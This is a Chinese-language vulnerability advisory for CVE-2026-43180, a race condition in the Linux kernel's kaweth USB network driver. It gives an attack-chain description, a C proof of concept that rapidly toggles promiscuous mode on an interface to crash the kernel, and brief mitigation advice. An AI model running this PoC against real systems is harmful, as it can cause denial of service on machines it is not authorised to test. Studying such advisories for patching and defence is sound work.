CVE-2026-43180 CVSS 7.8 高危

Linux kernel kaweth驱动竞态条件漏洞

披露日期: 2026-05-06

来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号

CVE-2026-43180

漏洞类型

竞态条件

CVSS评分

7.8 高危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel

漏洞概述

Linux内核中的kaweth网络驱动程序存在安全漏洞。该漏洞源于kaweth_set_rx_mode函数错误地操作了TX队列，调用了netif_stop_queue和netif_wake_queue。这种不当操作会在USB URB传输过程中过早唤醒发送队列，导致对同一URB进行重复提交。这不仅触发了内核警告，还可能引发系统崩溃或拒绝服务。

技术细节

该漏洞位于Linux内核的net/usb/kaweth.c驱动文件中。kaweth_set_rx_mode函数作为网络设备操作的回调，本应仅处理接收模式（如多播过滤），却错误地对发送队列进行了流控干预。当系统正在通过kaweth_start_xmit发送数据时，它会停止队列并提交URB。若此时kaweth_set_rx_mode被调用，它会立即唤醒队列。由于发送操作可能尚未完成，这导致kaweth_start_xmit再次被触发并尝试提交一个仍处于活动状态的URB，违反了USB核心的规则。这种竞态条件会导致内核抛出“URB submitted while active”警告，进而可能造成内核死锁或崩溃。

攻击链分析

STEP 1

步骤1

攻击者获取本地低权限用户访问权限。

STEP 2

步骤2

攻击者确保系统网络接口处于活跃状态，有数据包正在传输。

STEP 3

步骤3

攻击者运行恶意程序，快速循环修改网络接口的混杂模式或多播模式标志。

STEP 4

步骤4

频繁的标志变更触发kaweth_set_rx_mode函数，导致TX队列被错误唤醒。

STEP 5

步骤5

系统尝试提交活跃的URB，触发内核异常，导致系统崩溃或拒绝服务。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <linux/if.h>

/*
 * PoC for CVE-2026-43180
 * Trigger: Rapidly changing interface flags to invoke kaweth_set_rx_mode
 * while TX traffic is potentially active.
 */
int main() {
    int sock;
    struct ifreq ifr;
    char *iface = "eth0"; // Change to target interface name if needed

    sock = socket(AF_INET, SOCK_DGRAM, 0);
    if (sock < 0) {
        perror("socket");
        return 1;
    }

    memset(&ifr, 0, sizeof(ifr));
    strncpy(ifr.ifr_name, iface, IFNAMSIZ - 1);

    printf("[+] Starting PoC for CVE-2026-43180 on %s...\n", iface);

    while(1) {
        if (ioctl(sock, SIOCGIFFLAGS, &ifr) < 0) {
            perror("ioctl get");
            break;
        }

        // Toggle IFF_PROMISC to trigger ndo_set_rx_mode -> kaweth_set_rx_mode
        ifr.ifr_flags ^= IFF_PROMISC;

        if (ioctl(sock, SIOCSIFFLAGS, &ifr) < 0) {
            perror("ioctl set");
            break;
        }
        usleep(100);
    }

    close(sock);
    return 0;
}

影响范围

Linux Kernel (stable系列特定版本前)

防御指南

临时缓解措施

建议立即更新系统内核。在无法更新内核的情况下，可临时限制非特权用户对网络接口配置的修改权限，但这无法完全消除风险。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表